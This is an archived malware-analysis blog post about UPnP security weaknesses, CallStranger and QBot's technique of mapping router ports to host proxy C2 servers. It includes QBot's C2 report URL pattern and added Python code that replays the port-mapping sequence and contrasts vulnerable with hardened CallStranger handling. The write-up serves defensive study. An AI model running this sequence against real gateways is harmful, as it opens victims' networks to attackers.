{
	"id": "b3ebfed5-2a74-4706-93e6-b8af8302894e",
	"created_at": "2026-04-06T01:29:25.029889Z",
	"updated_at": "2026-04-10T03:21:23.497528Z",
	"deleted_at": null,
	"sha1_hash": "fdde746def670ece37e9d7682c01e460421632d7",
	"title": "UpnP – Messing up Security since years",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 647125,
	"plain_text": "UpnP – Messing up Security since years\r\nPublished: 2020-06-21 · Archived: 2026-04-06 00:57:42 UTC\r\nUPnP (Universal Plug and Play) is a set of networking protocols that lets devices discover each other’s presence on a network and offer services to one another.\r\nToo lazy to port forward yourself? Just enable UPnP and let the devices negotiate a working configuration among themselves! Dynamic device configuration like this certainly makes life more comfortable. Sadly, it also comes with many security issues.\r\nThis blog article walks through the stages of the UPnP protocol, gives a quick introduction to the security issues around UPnP, and shows how QBot abuses the protocol to turn devices into proxy C2 servers.\r\nUPnP in a nutshell\r\nUPnP builds on common networking protocols: it stacks HTTP, SOAP and XML on top of IP (discovery runs over UDP multicast, description and control over HTTP on TCP) in order to provide a variety of functions to users. Without going too deep into how UPnP works in detail, the following figure covers the basics.\r\nhttps://malwareandstuff.com/upnp-messing-up-security-since-years/\r\nPage 1 of 5\n\nFigure: quick explanation of the stages of the UPnP protocol\r\nSome services a node with UPnP enabled can offer (it really depends on the device):\r\nPort forwarding\r\nSwitching power on and off for light bulbs\r\netc.\r\nThis is very high level of course. If you are interested in everything about UPnP, I recommend the Wikipedia article[1] for a high-level introduction or this report, which goes into more detail[2].\r\nFor the rest of this article, only the first three stages (discovery, description and control) are really relevant; the CallStranger bug discussed below additionally touches the eventing stage.\r\nIoT Security and UPnP\r\nMisconfiguration\r\nAgain, while it might be very convenient for customers to have devices autoconfigure themselves, it creates huge security risks.\r\nMany routers have UPnP enabled by default. 
Think of a misconfigured IoT device that asks the gateway to forward a specific port, exposing that port to the internet; a UPnP internet gateway honours such an AddPortMapping request from any host on the LAN, without any authentication.\r\nIt is well known that many IoT devices contain awful security flaws, such as default credentials for telnet. If a device like this also exposes its telnet port to the outside, it probably takes about 5 minutes until some script kiddie adds it to their botnet.\r\nExploitation\r\nA blog post from TrendMicro[3] noted that many devices still use very old UPnP libraries that do not meet current security standards, which widens the attack surface. The newest example is CallStranger (CVE-2020-12695).\r\nsource: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12695\r\nIt is caused by the Callback header of the UPnP SUBSCRIBE request (part of the eventing stage): the device will later send event notifications to whatever URL that header names, and because an attacker controls the value, this amounts to a Server-Side-Request-Forgery-like vulnerability. It can be used for the following malicious purposes:\r\nExfiltrate data\r\nScan networks\r\nForce nodes to participate in DDoS attacks\r\nI recommend visiting the official domain[4] of this vulnerability if you want to learn more about it.\r\nUPnP abused by QBot\r\nSecurity risks created by UPnP are of course not limited to the IoT landscape.\r\nAnother way to abuse UPnP is to install proxy C2 servers on devices that have the protocol enabled, as QBot does. Let’s take a look at how this is done.\r\nDiving into QBot’s UPnP proxy module\r\nThis technique was first described by McAfee[4] in 2017. 
First, QBot scans for UPnP-enabled devices via SSDP and checks whether the reported type is one of the following search targets (two device types, two service types and the generic root-device target):\r\nurn:schemas-upnp-org:device:InternetGatewayDevice:1\r\nurn:schemas-upnp-org:service:WANIPConnection:1\r\nurn:schemas-upnp-org:service:WANPPPConnection:1\r\nupnp:rootdevice\r\nFigure: disassembly of the strcmp calls that check the device type\r\nIf you are using INetSim for malware analysis, you will notice that it offers no way to fake an SSDP or UPnP service at all. However, we can use this Python script[5] by user GrahamCobb, which emulates a fake SSDP service, and adjust the device description to suit our needs.\r\nOnce devices are discovered, QBot requests their device descriptions (the XML at the LOCATION URL from the SSDP reply) and checks whether it is dealing with an internet gateway device, which can be determined from the device description itself.\r\nFigure: captured SSDP traffic, showing the M-SEARCH request and the retrieval of the device description\r\nIf it is an internet gateway device, QBot confirms that a connection exists with the GetStatusInfo action and then retrieves the external IP address of the device with the GetExternalIPAddress action.\r\nNext it uses the AddPortMapping action to add port forwarding rules to the device.\r\nFigure: port forwarding command sent to the fake SSDP service\r\nAfterwards all rules are removed again, and the ports that were successfully forwarded are sent to the C2 server in an HTTP POST over HTTPS, in the following form:\r\n# destination address\r\nhttps://[HARDCODED_IP]:[HARDCODED_PORT]/bot_serv\r\n# POST data; the successfully forwarded ports are appended to ports=\r\ncmd=1\u0026msg=%s\u0026ports=\r\nFrom this point on, my analysis stopped for now.\r\n
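The exchange described above, as an added example that is not part of the original post and not QBot’s code: the same sequence (M-SEARCH, device description, GetStatusInfo, GetExternalIPAddress, AddPortMapping, then removal of the rules) in Python, driven against a constructed fake gateway instead of the network, much as the fake SSDP service stands in for a real router during analysis. The gateway address, the description XML, the SOAP replies, the internal client 192.168.1.50 and the use of DeletePortMapping for the removal step are assumptions made here; only the service types and action names come from the post.

```python
# Added example, not the post's analysis code and not QBot's: the three UPnP
# stages the post relies on (SSDP discovery, device description, SOAP control),
# run offline against a constructed fake gateway. Only the action names and the
# service types come from the post; every address, URL and reply is made up.
import re
import xml.etree.ElementTree as ET
from urllib.parse import urljoin

DQ = chr(34)              # a double-quote character
CRLF = chr(13) + chr(10)  # the CR LF line ending SSDP and HTTP use
NS = '{urn:schemas-upnp-org:device-1-0}'
WAN_SERVICES = ('urn:schemas-upnp-org:service:WANIPConnection:1',
                'urn:schemas-upnp-org:service:WANPPPConnection:1')
ENVELOPE = '''<s:Envelope xmlns:s='http://schemas.xmlsoap.org/soap/envelope/'><s:Body><u:%(a)s xmlns:u='%(t)s'>%(i)s</u:%(a)s></s:Body></s:Envelope>'''

def msearch(st, mx=2):
    '''Stage 1, discovery: M-SEARCH datagram for 239.255.255.250:1900 (UDP).'''
    return CRLF.join(['M-SEARCH * HTTP/1.1', 'HOST: 239.255.255.250:1900',
                      'MAN: ' + DQ + 'ssdp:discover' + DQ, 'MX: %d' % mx,
                      'ST: ' + st]) + CRLF + CRLF

def parse_ssdp_response(raw):
    '''Header dict (lower-cased keys) of a unicast 200 OK reply, else None.'''
    head = raw.split(CRLF + CRLF)[0].split(CRLF)
    if not head[0].startswith('HTTP/1.1 200'):
        return None
    return {k.strip().lower(): v.strip()
            for k, _, v in (line.partition(':') for line in head[1:])}

def find_wan_service(description_xml):
    '''Stage 2, description: (serviceType, controlURL) of the WAN*Connection
    service anywhere in the device tree, or None if this is not an IGD.'''
    root = ET.fromstring(description_xml)
    for svc in root.iter(NS + 'service'):
        stype = svc.findtext(NS + 'serviceType', '')
        if stype in WAN_SERVICES:
            return stype, svc.findtext(NS + 'controlURL', '')
    return None

def soap_action(service_type, action, args=None):
    '''Stage 3, control: headers and SOAP envelope for one action call.'''
    inner = ''.join('<%s>%s</%s>' % (k, v, k) for k, v in (args or {}).items())
    headers = {'SOAPAction': DQ + service_type + '#' + action + DQ,
               'Content-Type': 'text/xml; charset=utf-8'}
    return headers, ENVELOPE % {'a': action, 't': service_type, 'i': inner}

def soap_result(xml_text, name):
    m = re.search('<%s>(.*?)</%s>' % (name, name), xml_text)
    return m.group(1) if m else None

def run_igd_sequence(transport, ssdp_reply, description_xml, ports):
    '''The order the post describes: GetStatusInfo, GetExternalIPAddress,
    AddPortMapping per port, then the accepted rules are removed again
    (DeletePortMapping is assumed; the post only says they are removed).
    transport(url, headers, body) stands in for the HTTP POST. Returns
    (external_ip, accepted_ports), or None if not a connected IGD.'''
    hdrs = parse_ssdp_response(ssdp_reply)
    svc = find_wan_service(description_xml)
    if not hdrs or 'location' not in hdrs or svc is None:
        return None
    control_url = urljoin(hdrs['location'], svc[1])
    def call(action, args=None):
        h, b = soap_action(svc[0], action, args)
        return transport(control_url, h, b)
    if soap_result(call('GetStatusInfo'), 'NewConnectionStatus') != 'Connected':
        return None
    ext_ip = soap_result(call('GetExternalIPAddress'), 'NewExternalIPAddress')
    accepted = []
    for port in ports:
        reply = call('AddPortMapping', {
            'NewRemoteHost': '', 'NewExternalPort': port, 'NewProtocol': 'TCP',
            'NewInternalPort': port, 'NewInternalClient': '192.168.1.50',
            'NewEnabled': 1, 'NewPortMappingDescription': 'x', 'NewLeaseDuration': 0})
        if '<s:Fault>' not in reply:
            accepted.append(port)
    for port in accepted:
        call('DeletePortMapping', {'NewRemoteHost': '', 'NewExternalPort': port,
                                   'NewProtocol': 'TCP'})
    return ext_ip, accepted

# Constructed stand-in for the gateway, the role the fake SSDP service plays in
# the analysis; external ports in BUSY_PORTS are refused with UPnP error 718.
SAMPLE_SSDP_REPLY = CRLF.join([
    'HTTP/1.1 200 OK', 'CACHE-CONTROL: max-age=1800', 'ST: upnp:rootdevice',
    'LOCATION: http://192.168.1.1:5000/rootDesc.xml']) + CRLF + CRLF
SAMPLE_DESCRIPTION = '''<root xmlns='urn:schemas-upnp-org:device-1-0'><device>
<deviceType>urn:schemas-upnp-org:device:InternetGatewayDevice:1</deviceType>
<deviceList><device><deviceType>urn:schemas-upnp-org:device:WANDevice:1</deviceType>
<deviceList><device><deviceType>urn:schemas-upnp-org:device:WANConnectionDevice:1</deviceType>
<serviceList><service><serviceType>urn:schemas-upnp-org:service:WANIPConnection:1</serviceType>
<controlURL>/ctl/IPConn</controlURL></service></serviceList>
</device></deviceList></device></deviceList></device></root>'''
BUSY_PORTS = {443}

def fake_igd(control_url, headers, body):
    action = headers['SOAPAction'].strip(DQ).split('#')[1]
    if action == 'GetStatusInfo':
        return '<NewConnectionStatus>Connected</NewConnectionStatus>'
    if action == 'GetExternalIPAddress':
        return '<NewExternalIPAddress>203.0.113.7</NewExternalIPAddress>'
    if action == 'AddPortMapping' and int(soap_result(body, 'NewExternalPort')) in BUSY_PORTS:
        return '<s:Fault><errorCode>718</errorCode></s:Fault>'
    return '<ok/>'
```

Calling run_igd_sequence(fake_igd, SAMPLE_SSDP_REPLY, SAMPLE_DESCRIPTION, [22, 443, 8443]) yields ('203.0.113.7', [22, 8443]): port 443 is refused by the fake gateway with error 718 (ConflictInMappingEntry), and the two accepted ports are what a bot would append to the ports= field of its report. Against a real gateway, transport would be an HTTP POST of the body to control_url with the returned headers; the same sequence, minus AddPortMapping, is also a quick way to audit which of your own gateways answer UPnP at all.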
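Returning to the CallStranger weakness from the Exploitation section: the following is an added example, not code from the post or from the researchers who reported CVE-2020-12695. It builds a GENA SUBSCRIBE request and contrasts a handler that registers every Callback URL as given (the vulnerable behaviour) with one that refuses anything but the subscriber’s own address. The request contents, the paths and addresses, and the hardened policy are choices made here, not text from the UPnP specification.

```python
# Added example, not from the post or from the CallStranger researchers: a
# minimal GENA SUBSCRIBE handler showing why CVE-2020-12695 behaves like SSRF,
# beside a hardened one. The request below is constructed; the hardened policy
# (every Callback URL must point at the subscribing host itself) is one
# reasonable choice made here, not wording from the UPnP specification.
import ipaddress
import re
from urllib.parse import urlparse

CRLF = chr(13) + chr(10)

def subscribe_request(event_path, host, callbacks, timeout=1800):
    '''Stage 4, eventing: a SUBSCRIBE whose CALLBACK header lists one or more
    <url> entries, each of which the device will later NOTIFY.'''
    return CRLF.join([
        'SUBSCRIBE %s HTTP/1.1' % event_path,
        'HOST: %s' % host,
        'CALLBACK: %s' % ''.join('<%s>' % u for u in callbacks),
        'NT: upnp:event',
        'TIMEOUT: Second-%d' % timeout]) + CRLF + CRLF

def parse_callbacks(request):
    m = re.search('(?im)^CALLBACK:(.*)$', request)
    return re.findall('<([^>]+)>', m.group(1)) if m else []

def vulnerable_subscribe(request, subscriber_ip):
    '''CallStranger behaviour: the device registers every URL as given, so it
    will POST event data wherever the attacker pointed it (internal hosts for
    scanning, an external collector for exfiltration, a victim for DDoS).'''
    return parse_callbacks(request)

def hardened_subscribe(request, subscriber_ip, max_callbacks=1):
    '''Accept the subscription only if each callback is http://, carries a
    literal IP address (a hostname would let a later DNS answer redirect the
    NOTIFY) and that address is the subscriber itself; else reject it whole.'''
    urls = parse_callbacks(request)
    if not urls or len(urls) > max_callbacks:
        return []
    subscriber = ipaddress.ip_address(subscriber_ip)
    for u in urls:
        p = urlparse(u)
        try:
            ok = p.scheme == 'http' and ipaddress.ip_address(p.hostname) == subscriber
        except ValueError:
            ok = False
        if not ok:
            return []
    return urls
```

Rejecting the whole subscription rather than filtering the list keeps the device from half-accepting an attacker’s request, and capping the number of callbacks removes the fan-out that makes a single SUBSCRIBE useful for amplification. With the constructed request pointing at an external collector and an internal telnet port, vulnerable_subscribe returns both URLs while hardened_subscribe returns an empty list; a subscription whose only callback is the subscriber’s own address is accepted unchanged.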
McAfee’s write-up, however, explains that a new binary is then downloaded from the contacted C2 server; it re-adds the port forwarding rules and is responsible for the C2 communication. The McAfee article referenced above explains the whole functionality, so take a look at it if you are interested in the next steps.\r\nFinal Words\r\nAs you can see, UPnP carries many security weaknesses and can lead to a compromised network. If UPnP is enabled in your company’s network, check whether it is really needed and turn it off if it is not.\r\nExams at university are coming up next, so it will probably take some time until I can get my hands on the QBot C2 protocol or the proxy binary. I do, however, want to look at these two functionalities next.\r\nSource: https://malwareandstuff.com/upnp-messing-up-security-since-years/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://malwareandstuff.com/upnp-messing-up-security-since-years/"
	],
	"report_names": [
		"upnp-messing-up-security-since-years"
	],
	"threat_actors": [],
	"ts_created_at": 1775438965,
	"ts_updated_at": 1775791283,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fdde746def670ece37e9d7682c01e460421632d7.pdf",
		"text": "https://archive.orkl.eu/fdde746def670ece37e9d7682c01e460421632d7.txt",
		"img": "https://archive.orkl.eu/fdde746def670ece37e9d7682c01e460421632d7.jpg"
	}
}